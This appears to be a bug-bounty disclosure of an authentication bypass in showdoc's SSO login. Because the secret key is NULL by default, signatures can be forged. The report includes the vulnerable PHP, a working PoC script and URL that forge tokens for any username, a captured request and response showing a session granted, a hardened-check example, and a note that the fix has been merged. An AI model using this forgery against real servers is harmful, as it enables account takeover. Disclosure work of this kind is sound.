Authentication Bypass Using an Alternate Path or Channel in star7th/showdoc

Valid

Reported on

Oct 13th 2021


Description

showdoc provides an SSO login process; its documentation is at https://www.showdoc.com.cn/p/0fb2753c5a48acc7c3fbbb00f9504e6b

The authorization is implemented with a LoginSecretKey, and the usual call looks like this:

http://{{host}}/server/?s=/api/extLogin/bySecretKey&username={{username}}&time={{time}}&token={{token}}&redirect={{redirect}}

When handling this URI, the server checks whether the signature is valid, using the $login_secret_key.

A valid signature should be generated by:
    $token = md5($username.$login_secret_key.$time);

But as you can see in https://github.com/star7th/showdoc/blob/master/server/Application/Api/Controller/ExtLoginController.class.php#L21, if the admin has not configured the $login_secret_key yet (the default case), the value of $login_secret_key will be NULL:

public function bySecretKey(){
    $username = I("username") ;  // KNOWN
    $key = I("key") ;
    $time = I("time") ;  // KNOWN
    $token = I("token") ;  // CONTROLLED by us
    $redirect = I("redirect") ;

    if($time < (time() - 60) ){
        $this->sendError(10101,"已过期");  // "expired": only stale timestamps are rejected
        return ;
    }
    $login_secret_key = D("Options")->get("login_secret_key") ; // $login_secret_key = NULL by default, KNOWN

    $new_token = md5($username.$login_secret_key.$time);   // Forge signature
    if($token !=  $new_token){
        $this->sendError(10101,"token不正确");  // "token incorrect"
        return ;
    }
    // ... remainder of the method omitted from this excerpt
}

Since the value of $login_secret_key is known (NULL), we can forge a valid signature for any username on a default-installed showdoc server and log in as any existing user.
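For contrast, here is a hardened form of that check as an added example; it is not showdoc's code nor its actual fix in commit 19a0a0, and it deliberately switches from `md5(username.key.time)` to an HMAC with a separator, so existing SSO clients would need to generate tokens the same way. The key idea is that an unconfigured key must disable the SSO path instead of silently acting as an empty string.

```php
<?php
// Added example, not showdoc's code. Contrasts the vulnerable check with a hardened one.

// Vulnerable logic as shown in the report: a NULL/empty key still "signs" tokens.
function vulnerableCheck($secretKey, string $username, int $time, string $token, int $now): bool
{
    if ($time < ($now - 60)) {
        return false;
    }
    return $token == md5($username . $secretKey . $time); // NULL coerces to ""
}

// Hardened variant: refuse to operate without a configured key, bound the
// timestamp on both sides, bind the key with an HMAC, compare in constant time.
function hardenedCheck($secretKey, string $username, int $time, string $token, int $now): bool
{
    if (!is_string($secretKey) || $secretKey === '') {
        return false; // SSO stays disabled until the admin actually sets a key
    }
    if ($time < ($now - 60) || $time > ($now + 60)) {
        return false; // reject stale AND future timestamps (the PoC used now + 18000)
    }
    $expected = hash_hmac('sha256', $username . '|' . $time, $secretKey); // separator avoids ambiguous concatenation
    return hash_equals($expected, $token); // strict, constant-time comparison instead of !=
}

// Self-check with constructed values (not taken from a real deployment).
function check(bool $cond, string $what): void
{
    if (!$cond) {
        throw new RuntimeException("FAILED: $what");
    }
}

$now = 1634139059;
$forged = md5('test_user' . NULL . ($now + 18000)); // what the PoC script computes
check(vulnerableCheck(NULL, 'test_user', $now + 18000, $forged, $now) === true, 'vulnerable check accepts forged token');
check(hardenedCheck(NULL, 'test_user', $now + 18000, $forged, $now) === false, 'hardened check rejects with no key');

$key = 'constructed-secret-key';
$good = hash_hmac('sha256', 'test_user|' . $now, $key);
check(hardenedCheck($key, 'test_user', $now, $good, $now) === true, 'hardened check accepts valid token');
check(hardenedCheck($key, 'test_user', $now + 18000, $good, $now) === false, 'hardened check rejects future timestamp');
check(hardenedCheck($key, 'test_user', $now, $forged, $now) === false, 'hardened check rejects md5 forgery');
echo "all checks passed\n";
```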

The impact an attacker can achieve by exploiting this vulnerability is listed under Impact below.

Proof of Concept

Visit the following link:

http://showdoc/server/?s=/api/extLogin/bySecretKey&username=test_user&time=1734103451&token=4726c0b9a759feeef55d64cb279818eb&redirect=

Or generate the PoC URL with this script:

<?php
//  Credit: Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
/*  ShowDoc v2.9.10 Auth Bypass PoC #1
 *      Date: 2021/10/13
 */
$username = 'test_user' ;
$time = time() + 18000 ;      // a future timestamp passes the server's check, which only rejects stale ones
$login_secret_key = NULL;     // the default, unconfigured value

$token = md5($username.$login_secret_key.$time);

// Replace [showdoc] with the host under test
echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;
?>

HTTP request

GET /server/?s=/api/extLogin/bySecretKey&username=test_user&time=1634139059&token=f4e70d909ae17704ec0f63cffd2894a6&redirect= HTTP/1.1
Host: showdoc

Response

HTTP/1.1 302 Found
Server: nginx/1.15.11
Date: Wed, 13 Oct 2021 10:48:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Set-Cookie: PHPSESSID=i893g37c56c92dmompidfttked; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: cookie_token=e2154f0de2a87a7f49f3de532cd8fefc4a1b134e4a2213d8423dde57220e9179; expires=Mon, 11-Apr-2022 10:48:02 GMT; Max-Age=15552000; path=/; HttpOnly
location: ../web/#/item/index
Content-Length: 0


Notice: do not visit the SSO management part of the admin panel while testing, because opening it initializes the key.

Impact

This vulnerability is capable of

  • Log in to any existing account
  • Register unlimited accounts, bypassing the CAPTCHA

Timeline

We have contacted a member of the star7th/showdoc team and are waiting to hear back 13 days ago
star7th validated this vulnerability 13 days ago
hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th confirmed that a fix has been merged on 19a0a0 13 days ago
star7th has been awarded the fix bounty